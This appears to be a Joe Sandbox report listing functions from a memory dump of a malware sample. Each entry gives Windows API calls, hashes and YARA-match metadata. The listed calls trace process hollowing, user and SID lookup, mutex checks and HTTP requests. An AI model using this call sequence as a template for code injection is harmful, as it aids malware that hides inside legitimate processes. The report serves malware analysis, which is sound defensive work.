                            • Instruction ID: 83f9d844ad0cd6d1c4631e869102225cbfef8634c22320d2f0f41752341863a0
                            • Opcode Fuzzy Hash: 1d21bacbc552e007d8faf7eb33d88b9e870f4373daa2eb88e1600b9551244f7d
                            • Instruction Fuzzy Hash: 7E112A71A0420AAFCF15DF98E940A9B7BF4EF48318F054059F809EB251E770EA11CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 682 137ed56-137ed63 call 137f925 684 137ed68-137ed73 682->684 685 137ed75-137ed77 684->685 686 137ed79-137ed81 684->686 687 137edc4-137edd0 call 137d653 685->687 686->687 688 137ed83-137ed87 686->688 689 137ed89-137edbe call 137e503 688->689 694 137edc0-137edc3 689->694 694->687
                            APIs
                              • Part of subcall function 0137F925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0137E0E6,00000001,00000364,00000006,000000FF,?,?,01378272,?), ref: 0137F966
                            • _free.LIBCMT ref: 0137EDC5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                            • Instruction ID: dea11f782821891e2715a7748db72d8803131c5699091981e660b4d132e76d98
                            • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                            • Instruction Fuzzy Hash: C1014572604356AFC3318FADD88499AFBD8EB053B4F01026AE555A76C0E774A800CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                            • Instruction ID: e50cd3f10b69f1a95895c6b6bf25e0991aadf04cbee5113d70789fd7de25b68f
                            • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                            • Instruction Fuzzy Hash: 45014F72C0025AAFCF01AFA88C00AEF7FB5AF18228F144165ED15E2190E6718A60DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0137E0E6,00000001,00000364,00000006,000000FF,?,?,01378272,?), ref: 0137F966
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 0e40393c96f9593b53dc8be37a1b1a8d932fea37126cec52e46927d07555d67a
                            • Instruction ID: 39c1bf2864ba96f6dfc2a755c39e4d519af3fe0cc858c6a69b0ef074da0279c2
                            • Opcode Fuzzy Hash: 0e40393c96f9593b53dc8be37a1b1a8d932fea37126cec52e46927d07555d67a
                            • Instruction Fuzzy Hash: 92F0543165562AB6EB325A3A9804BAB7B5DBF537B8B048115ED34A7184CA28D80186F1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137DB6E
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 6ffcb47658f9ef776f90c00d3cab363c3cd48ac50dcb70f3dc2815b6174fb03c
                            • Instruction ID: e868797074db7fd6626fb8a9aaf938d085ab8ee9471478632ee39a45ebce32d7
                            • Opcode Fuzzy Hash: 6ffcb47658f9ef776f90c00d3cab363c3cd48ac50dcb70f3dc2815b6174fb03c
                            • Instruction Fuzzy Hash: 23E09B7150425667EE3126FE9D00B7B7A5CAF513FDF050125DD15972C4CB1CC80182F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFileW.KERNELBASE(00000000,00000000,?,01382758,?,?,00000000,?,01382758,00000000,0000000C), ref: 01382385
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: b292d1b2cd6eb3373074437a2a5667d0081640f35d0ad008021def434c5add80
                            • Instruction ID: b2a7a5b97b6cc19fe5e0d29519ef1b7765538ccfe3240e6694af2f451c53e31c
                            • Opcode Fuzzy Hash: b292d1b2cd6eb3373074437a2a5667d0081640f35d0ad008021def434c5add80
                            • Instruction Fuzzy Hash: 68D06C3201020DBBDF129F84DD46EDA3FAAFB48714F014010FA1856020C732E821AB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013638E6
                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0136394B
                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 01363964
                            • GetThreadContext.KERNEL32(?,00000000), ref: 0136397F
                            • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 013639A3
                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 013639BE
                            • GetProcAddress.KERNEL32(00000000), ref: 013639C5
                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 013639ED
                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 01363A0E
                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 01363A5A
                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 01363A96
                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 01363AB2
                            • ResumeThread.KERNEL32(?,?,?,00000000), ref: 01363ABE
                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 01363ACC
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01363AED
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                            • String ID: $NtUnmapViewOfSection$ntdll.dll
                            • API String ID: 4033543172-1522589568
                            • Opcode ID: 944a0021c676206e28c32f83b6c1556c4de6690412f620af6c486c555a45db28
                            • Instruction ID: ccf209973c191fd5e429b5c972f9def23d9d9b80131b5f045aafb6fcfe2f7f70
                            • Opcode Fuzzy Hash: 944a0021c676206e28c32f83b6c1556c4de6690412f620af6c486c555a45db28
                            • Instruction Fuzzy Hash: 30519DB1A00318AFEB219F55DC49FEEB778FF08705F1040A5F609AA280D772A994CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateMutexW.KERNEL32(00000000,00000000,?,0139918C,774AE603,?,00000000,00000000), ref: 01367F61
                            • GetLastError.KERNEL32(?,00000000,00000000), ref: 01367F67
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID:
                            • API String ID: 1925916568-0
                            • Opcode ID: 785ba33d48bcf7f2e0a812e784066fe4e561a272063ec4c2e7bb1827a5f2d07b
                            • Instruction ID: cfe46cf4273de212e5dfb3d2be432e647a19ccb469f5c31614e04935c2a34251
                            • Opcode Fuzzy Hash: 785ba33d48bcf7f2e0a812e784066fe4e561a272063ec4c2e7bb1827a5f2d07b
                            • Instruction Fuzzy Hash: 70224971A102089FEB28DF6CCC88B9DBB79EF5931CF64856CE505A72D8D7349A80CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$InformationTimeZone
                            • String ID:
                            • API String ID: 597776487-0
                            • Opcode ID: d0d774bafd1de6501b2725087d5ef1a0c0d0d809453d5428798228f474a2cfcc
                            • Instruction ID: a32f40c147e46d4eeb38a14f161e9f2b1e042f6bc5d2bac7540cc2cd2d9d8a51
                            • Opcode Fuzzy Hash: d0d774bafd1de6501b2725087d5ef1a0c0d0d809453d5428798228f474a2cfcc
                            • Instruction Fuzzy Hash: A8C13872A00306AFDB21BF6DC850AAABFBDFF55B58F1401A9D58497381E735CA05C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01377B12
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: FeaturePresentProcessor
                            • String ID:
                            • API String ID: 2325560087-0
                            • Opcode ID: 0bd741083a7d6d03cb9c95a32bab43cf232f601d38902137a22c2d2baa0b3586
                            • Instruction ID: 4447b265ec9110b1611a3a65028d0db184db94c107cb53f1e96c3713f33777ec
                            • Opcode Fuzzy Hash: 0bd741083a7d6d03cb9c95a32bab43cf232f601d38902137a22c2d2baa0b3586
                            • Instruction Fuzzy Hash: BA515171E0021A8BEF35CF69D8897AABBF5FB48318F14896AD506E7344D3799900CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 01363132
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 01363147
                            • HeapAlloc.KERNEL32(00000000), ref: 0136314A
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 01363158
                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0136317B
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 01363186
                            • HeapAlloc.KERNEL32(00000000), ref: 01363189
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 01363199
                            • HeapAlloc.KERNEL32(00000000), ref: 0136319C
                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 013631C6
                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 013631D9
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 013632D5
                            • HeapFree.KERNEL32(00000000), ref: 013632DE
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013632E3
                            • HeapFree.KERNEL32(00000000), ref: 013632E6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013632ED
                            • HeapFree.KERNEL32(00000000), ref: 013632F0
                            • LocalFree.KERNEL32(00000000), ref: 013632F5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                            • String ID:
                            • API String ID: 3326663573-0
                            • Opcode ID: 1d86bb016c49999ba1de55d34d85405e2409e38f7e3700aea37e231b67b488f3
                            • Instruction ID: 16bd8ec9a6dc9e6d8bd551713a3aa2024982ce4b9e6502b90b61f4f6a92fe6fa
                            • Opcode Fuzzy Hash: 1d86bb016c49999ba1de55d34d85405e2409e38f7e3700aea37e231b67b488f3
                            • Instruction Fuzzy Hash: D57152B1D00209AFEB25DFA9DC84BAFBBBCFF48314F108529E915A7244DB349905CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 01381705
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 013812BB
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 013812CD
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 013812DF
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 013812F1
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 01381303
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 01381315
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 01381327
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 01381339
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 0138134B
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 0138135D
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 0138136F
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 01381381
                              • Part of subcall function 0138129E: _free.LIBCMT ref: 01381393
                            • _free.LIBCMT ref: 013816FA
                              • Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
                              • Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B
                            • _free.LIBCMT ref: 0138171C
                            • _free.LIBCMT ref: 01381731
                            • _free.LIBCMT ref: 0138173C
                            • _free.LIBCMT ref: 0138175E
                            • _free.LIBCMT ref: 01381771
                            • _free.LIBCMT ref: 0138177F
                            • _free.LIBCMT ref: 0138178A
                            • _free.LIBCMT ref: 013817C2
                            • _free.LIBCMT ref: 013817C9
                            • _free.LIBCMT ref: 013817E6
                            • _free.LIBCMT ref: 013817FE
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 31c01f194f1a71f8dd875a73d417b3333fa24a2222e52bbe5bec00e54712dff8
                            • Instruction ID: 97c0743541ad2167d16290f0636f0fe9de9343f35d48282a8b495b72d0f673be
                            • Opcode Fuzzy Hash: 31c01f194f1a71f8dd875a73d417b3333fa24a2222e52bbe5bec00e54712dff8
                            • Instruction Fuzzy Hash: 523169316003069FEB31BF7CD844B5AB7E9EF00628F10842EE15ED7190DA74EA82CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsInExceptionSpec.LIBVCRUNTIME ref: 01378CC2
                            • type_info::operator==.LIBVCRUNTIME ref: 01378CE9
                            • ___TypeMatch.LIBVCRUNTIME ref: 01378DF5
                            • IsInExceptionSpec.LIBVCRUNTIME ref: 01378ED0
                            • _UnwindNestedFrames.LIBCMT ref: 01378F57
                            • CallUnexpected.LIBVCRUNTIME ref: 01378F72
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 2123188842-393685449
                            • Opcode ID: a5dc9c883309dae3b86ea6a089267b72d54e26f975ab54b726b7054751c5a669
                            • Instruction ID: f2147ecb97474394a9e3ef72382c252102b8ac633957c5be0ad47fe97c69869b
                            • Opcode Fuzzy Hash: a5dc9c883309dae3b86ea6a089267b72d54e26f975ab54b726b7054751c5a669
                            • Instruction Fuzzy Hash: 83C19D71C0020AEFCF39DF98D8889AEBBB5BF14318F04459AE9156B611D339DA51CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _free.LIBCMT ref: 0137DE42
                              • Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
                              • Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B
                            • _free.LIBCMT ref: 0137DE4E
                            • _free.LIBCMT ref: 0137DE59
                            • _free.LIBCMT ref: 0137DE64
                            • _free.LIBCMT ref: 0137DE6F
                            • _free.LIBCMT ref: 0137DE7A
                            • _free.LIBCMT ref: 0137DE85
                            • _free.LIBCMT ref: 0137DE90
                            • _free.LIBCMT ref: 0137DE9B
                            • _free.LIBCMT ref: 0137DEA9
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 4d6d89e8cba0fc63c1f948f7e1d6fe4f73fe5e8efe6f34493540b307b2acdedf
                            • Instruction ID: 7bfcff11f7dcad3b9d11f971216d57e9119aba0fe986d7fb4e57b87d6513dcd4
                            • Opcode Fuzzy Hash: 4d6d89e8cba0fc63c1f948f7e1d6fe4f73fe5e8efe6f34493540b307b2acdedf
                            • Instruction Fuzzy Hash: 9A21C976904109AFCB11EFD8C880DDE7BB8BF18654F4081A6F61E9B120DB75EA84CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InternetOpenW.WININET(01393F6C,00000000,00000000,00000000,00000000), ref: 0136871C
                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 01368740
                            • HttpOpenRequestA.WININET(?,00000000), ref: 0136878A
                            • HttpSendRequestA.WININET(?,00000000), ref: 0136884A
                            • InternetReadFile.WININET(?,?,000003FF,?), ref: 013688FC
                            • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 013689B0
                            • InternetCloseHandle.WININET(?), ref: 013689D7
                            • InternetCloseHandle.WININET(?), ref: 013689DF
                            • InternetCloseHandle.WININET(?), ref: 013689E7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                            • String ID:
                            • API String ID: 1354133546-0
                            • Opcode ID: 9215dc1c7c77508a28cee1cff568cd2eb5598e0f581621e4be6e82de333c941c
                            • Instruction ID: 63d313f4cde4ad322ae7e6a5c74049de662920fd386c2c45f7e32b673d36f1f6
                            • Opcode Fuzzy Hash: 9215dc1c7c77508a28cee1cff568cd2eb5598e0f581621e4be6e82de333c941c
                            • Instruction Fuzzy Hash: BDC1F8B06102199BEB28CF28CC88BDD7F79EF45318F5481E8E60897299D7759AC0CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef68f6ec86eac2c26c5366e115fadec6d7b31c9c98d7bbc0f38f0bd1f6ef9655
                            • Instruction ID: ecd1013ba2df94cb66fa50838a4f7b489f497faa3faf0f2e01577dc791cb9a52
                            • Opcode Fuzzy Hash: ef68f6ec86eac2c26c5366e115fadec6d7b31c9c98d7bbc0f38f0bd1f6ef9655
                            • Instruction Fuzzy Hash: 9BC1F371E0434A9FEF21EF9CD880BADBBB5AF4A328F144059E515AB381C7349941CF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$___from_strstr_to_strchr
                            • String ID:
                            • API String ID: 3409252457-0
                            • Opcode ID: b2d7d02a4ef05aef43a781f0c118bfe249aa78d1d6e5f7c918c1472bb84075ce
                            • Instruction ID: 61eae9c0b094f5f0d10e5c1797b9d990495a6e2e093edd3564ad3816fbf2bd3b
                            • Opcode Fuzzy Hash: b2d7d02a4ef05aef43a781f0c118bfe249aa78d1d6e5f7c918c1472bb84075ce
                            • Instruction Fuzzy Hash: AF510571904386AFEF39BFBC8880A6D7BB8AF0171CF04416EF9159B285DB758149CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 013785A7
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 013785AF
                            • _ValidateLocalCookies.LIBCMT ref: 01378638
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 01378663
                            • _ValidateLocalCookies.LIBCMT ref: 013786B8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
